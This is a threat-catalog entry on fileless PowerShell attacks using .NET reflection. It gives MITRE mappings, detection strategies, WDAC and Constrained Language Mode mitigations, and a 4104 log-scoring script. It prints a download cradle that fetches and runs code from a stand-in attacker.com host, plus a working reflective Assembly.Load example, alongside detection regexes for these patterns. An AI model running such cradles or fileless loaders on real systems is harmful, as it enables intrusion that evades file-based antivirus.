
PowerShell - Reflection and .NET Abuse

⚠️ Critical Risk | 📁 Script Engine API | 🏷️ code execution | ✅ Verified
#script-engine-api #reflection #fileless-malware

🔧 API Details

Namespace

PowerShell.exe

Language

PowerShell

📊 Risk Assessment

Severity

Critical

Prevalence

widespread

Ease of Abuse

easy

Likelihood in Real Attacks

95%

🎯 MITRE ATT&CK Techniques

Abuse Scenarios

Fileless malware via reflection

Technique: T1620 (Reflective Code Loading), delivered through T1059.001 (Command and Scripting Interpreter: PowerShell). T1027.011 (Obfuscated Files or Information: Fileless Storage) applies only when the staged assembly is kept in the registry or WMI repository rather than fetched over the network.

🚨 Common in Campaigns

[System.Reflection.Assembly]::Load([byte[]]) maps a .NET assembly straight from a byte array (downloaded, base64-decoded, or read from the registry) into the PowerShell process; types and methods are then resolved and invoked through reflection, so no PE file ever touches disk and file-based AV has nothing to scan. The download-cradle variant below fetches script text instead of an assembly and evaluates it with Invoke-Expression; the effect is the same: code runs in memory only.

Code Example:

# LoadWithPartialName is deprecated, and WebClient actually lives in System.dll, which PowerShell already has loaded; the call is part of the widely copied cradle rather than a prerequisite.
[Reflection.Assembly]::LoadWithPartialName("System.Net")
# Download cradle: fetch script text over HTTP and evaluate it in memory, no file on disk.
$wc = New-Object Net.WebClient; iex $wc.DownloadString('http://attacker.com/payload')

Detection Difficulty: Hard
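The assembly-from-bytes pattern described above, as an added example that is not code from the catalog entry. It keeps the technique offline: where a real cradle fills $bytes from the network (for instance (New-Object Net.WebClient).DownloadData($url)), this script compiles a throwaway assembly locally, reads its bytes, deletes the file, and only then performs the reflective load and invocation. The Demo.Payload type, its Run method and the temp-file staging are assumptions made for the demonstration.

```powershell
# Added example: Assembly.Load(byte[]) plus reflection-based invocation, with no C2.
# Demo.Payload is a made-up type compiled here only so the script runs stand-alone.
$source = @'
namespace Demo {
    public static class Payload {
        public static string Run(string operatorName) {
            return "executed in memory for " + operatorName;
        }
    }
}
'@

# Stand-in for the downloaded payload: compile to a temp DLL, read the bytes, remove the file.
# (Constructed staging; an attacker never has this step, the bytes simply arrive from the network.)
$stage = Join-Path ([IO.Path]::GetTempPath()) ('demo_' + [guid]::NewGuid().ToString('N') + '.dll')
Add-Type -TypeDefinition $source -OutputAssembly $stage
$bytes = [IO.File]::ReadAllBytes($stage)
Remove-Item -LiteralPath $stage -Force

# Reflective load: the CLR maps the image from the byte array. Nothing on disk backs it.
$asm = [System.Reflection.Assembly]::Load($bytes)

# Resolve and invoke the method by name, the way a loader handles a payload it has no compile-time reference to.
$method = $asm.GetType('Demo.Payload').GetMethod('Run')
$result = $method.Invoke($null, [object[]]@('operator'))
$result

# What a defender sees: a loaded assembly whose Location is empty, i.e. there is no file path to scan.
"Location: '{0}' (empty => loaded from memory)" -f $asm.Location
```

The empty Location string is exactly what memory-only assembly telemetry keys on: every file-backed assembly in the AppDomain carries a path, so an assembly without one that appeared right after an outbound connection from powershell.exe is a strong signal.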

🔍 Detection Strategies

Microsoft Defender

MEDIUM Effectiveness

AMSI hands Defender the script content at execution time, after PowerShell has decoded it, so well-known cradle strings ([Reflection.Assembly]::Load, LoadWithPartialName, New-Object Net.WebClient with DownloadString and IEX) are signature-detectable. Coverage drops against obfuscation, AMSI patching, and assemblies whose bytes never pass through script text.

EDR

HIGH Effectiveness

Behavioral detection of reflection-based execution: powershell.exe or pwsh.exe making an outbound connection and then loading an assembly with no backing file, CLR assembly-load telemetry for images with an empty path, and script block content correlated with the resulting process and network activity.

🛡️ Mitigation Strategies

policy

HIGH Feasibility

Restrict PowerShell execution via WDAC/AppLocker. An enforced WDAC or AppLocker script policy also places PowerShell in Constrained Language Mode, which blocks arbitrary .NET type access: [Reflection.Assembly]::Load and New-Object Net.WebClient both fail there, so the cradle above cannot run even if the script text is delivered.

monitoring

MEDIUM Feasibility

Enable Script Block Logging (Event ID 4104 in Microsoft-Windows-PowerShell/Operational) and Module Logging (Event ID 4103), forward the events, and alert on reflection and download-cradle patterns. 4104 records the script text as PowerShell executes it, so base64- or concatenation-obfuscated cradles still surface in clear text.
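One way to act on Script Block Logging, as an added example that is not part of the catalog entry: score each 4104 script-block text against a small indicator set for the reflection-plus-cradle combination, first over constructed sample texts so it runs offline, then over the host's own log. The regex set, the indicator names and the score threshold of 2 are assumptions chosen for this page's pattern, not a vendor or Sigma rule; tune them to your environment.

```powershell
# Added example: scoring Script Block Logging text (Event ID 4104) for reflective-load cradles.
# Indicator regexes and the threshold are assumptions for this demonstration, not a vendor rule.
$Indicators = [ordered]@{
    ReflectionLoad   = '\[(System\.)?Reflection\.Assembly\]\s*::\s*(Load|LoadWithPartialName|LoadFile|UnsafeLoadFrom)\b'
    DownloadCradle   = '(Net\.WebClient|Invoke-WebRequest|Invoke-RestMethod|DownloadString|DownloadData)'
    InvokeExpression = '(^|[\s;|(])(iex|Invoke-Expression)\b'
    Base64Decode     = '\[(System\.)?Convert\]\s*::\s*FromBase64String'
}

function Test-ScriptBlockText {
    param(
        [Parameter(Mandatory)][string]$Text,
        [string]$Source = 'sample'
    )
    # One hit per indicator family; the score is the number of families present.
    $hits = @($Indicators.Keys | Where-Object { $Text -imatch $Indicators[$_] })
    [pscustomobject]@{
        Source     = $Source
        Score      = $hits.Count
        Indicators = ($hits -join ',')
        Preview    = $Text.Substring(0, [Math]::Min(70, $Text.Length))
    }
}

# Constructed 4104 script-block texts: two cradles and one benign admin one-liner.
$samples = @(
    '[Reflection.Assembly]::LoadWithPartialName("System.Net"); $wc = New-Object Net.WebClient; iex $wc.DownloadString(''http://attacker.com/payload'')',
    '$b = [Convert]::FromBase64String($env:STAGE); [Reflection.Assembly]::Load($b).EntryPoint.Invoke($null, @())',
    'Get-ChildItem C:\Logs -Recurse | Where-Object Length -gt 1MB | Sort-Object LastWriteTime -Descending'
)
# Expected: the first sample scores 3, the second 2, the benign one 0 and is filtered out.
$samples | ForEach-Object { Test-ScriptBlockText -Text $_ } |
    Where-Object Score -ge 2 | Format-Table -AutoSize

# Same scoring over this host's log (Windows only; needs Script Block Logging enabled and log read access).
# In a 4104 event the script text is Properties[2]; Properties[0..1] are the fragment counters.
if ($IsWindows -or $PSEdition -eq 'Desktop') {
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } -MaxEvents 1000 -ErrorAction SilentlyContinue |
        ForEach-Object { Test-ScriptBlockText -Text $_.Properties[2].Value -Source $_.TimeCreated } |
        Where-Object Score -ge 2 | Format-Table -AutoSize
}
```

Requiring two indicator families rather than one keeps the noise down: administrators legitimately call Invoke-WebRequest or FromBase64String on their own, but reflection loading combined with a download or a base64 blob in the same script block is rare outside loaders.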

🕵️ Threat Intelligence

👥 APT Groups / Threat Actors

APT29

APT28

FIN7

🦠 Malware Families

PowerShell Empire

Cobalt Strike

🔨 Tools

Empire

Cobalt Strike

PsExec

📋 Metadata

API ID

6dc5ff82-15f2-4fe7-b817-65ebe068c188

Created

2026-02-02

Author

Claw